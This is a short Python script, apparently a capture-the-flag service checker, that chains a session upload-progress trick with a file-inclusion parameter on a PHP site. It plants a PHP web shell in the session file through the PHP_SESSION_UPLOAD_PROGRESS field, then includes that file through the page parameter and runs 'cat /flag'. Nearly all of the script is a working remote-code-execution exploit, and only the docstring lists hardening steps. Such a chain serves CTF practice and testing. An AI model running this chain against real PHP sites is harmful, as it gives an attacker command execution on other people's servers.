#!/usr/bin/python
# -*- coding: utf-8 -*-
import re, sys, requests

# Checker arguments, taken positionally from the command line:
#   argv[1] -> HOST, argv[2] -> PORT, argv[3] -> FLAG (the value that the
#   __main__ block compares against what exp() recovers).
# This runs at import time; the tuple unpack raises ValueError when fewer
# than three arguments are supplied.
HOST, PORT, FLAG = sys.argv[1:4]

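def exp(ip, port):
    """Run the service check against one target and return the recovered flag body.

    The check issues three requests, all carrying the same client-chosen
    ``PHPSESSID`` cookie:

    1. ``POST /login.php`` with the fixed ``user`` credentials.
    2. ``POST /upload.php`` with a multipart upload whose
       ``PHP_SESSION_UPLOAD_PROGRESS`` field holds a PHP snippet.
    3. ``GET /index.php`` with ``page`` pointing at ``/tmp/sess_<id>``.

    A flag in the third response means the target is still vulnerable.
    Presumably ``page`` reaches an include-style sink and sessions are
    file-backed under ``/tmp`` (inferred from the request shape, confirm
    against the service source). Hardening to verify on the target:

    * resolve ``page`` through an allow-list instead of a raw path;
    * enable ``session.use_strict_mode`` so client-supplied session ids
      are rejected;
    * turn off ``session.upload_progress.enabled`` if the feature is unused.

    Args:
        ip: Host name or address of the target service.
        port: TCP port of the target service.

    Returns:
        The text captured between ``DASCTF{`` and ``}`` in the final response.

    Raises:
        IndexError: If the final response contains no ``DASCTF{...}`` token.
        requests.exceptions.RequestException: On connection errors or when
            a request exceeds the timeout.
    """
    base = f"http://{ip}:{port}"
    sid = "ctfexploitsession"
    jar = {"PHPSESSID": sid}
    # Bound every request so an unresponsive target fails the check instead
    # of hanging the checker forever (requests has no default timeout).
    timeout = 10

    credentials = {"username": "user", "password": "user123"}
    requests.post(
        f"{base}/login.php",
        data=credentials,
        cookies=jar,
        allow_redirects=False,
        timeout=timeout,
    )

    progress_field = {
        "PHP_SESSION_UPLOAD_PROGRESS": "<?php system($_GET['cmd']); ?>"
    }
    upload = {"file": ("exploit.txt", "A" * 5000)}
    requests.post(
        f"{base}/upload.php",
        data=progress_field,
        files=upload,
        cookies=jar,
        timeout=timeout,
    )

    resp = requests.get(
        f"{base}/index.php?page=/tmp/sess_{sid}&cmd=cat /flag",
        cookies=jar,
        timeout=timeout,
    )
    found = re.search(r'DASCTF{(.*?)}', resp.text)
    if found is None:
        # Keep IndexError (what the original `[0]` raised) but say why.
        raise IndexError("no DASCTF{...} token in the index.php response")
    return found.group(1)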

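if __name__ == '__main__':
    # Compare explicitly instead of using `assert`: under `python -O` the
    # assert statement (and the exp() call inside it) is stripped, so the
    # checker would print "Pass!" without contacting the target at all.
    # Note that exp() returns only the text inside DASCTF{...}, so FLAG is
    # compared against that inner value.
    if exp(HOST, PORT) != FLAG:
        sys.exit("Fail: recovered flag does not match the expected value")
    print("Pass!")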

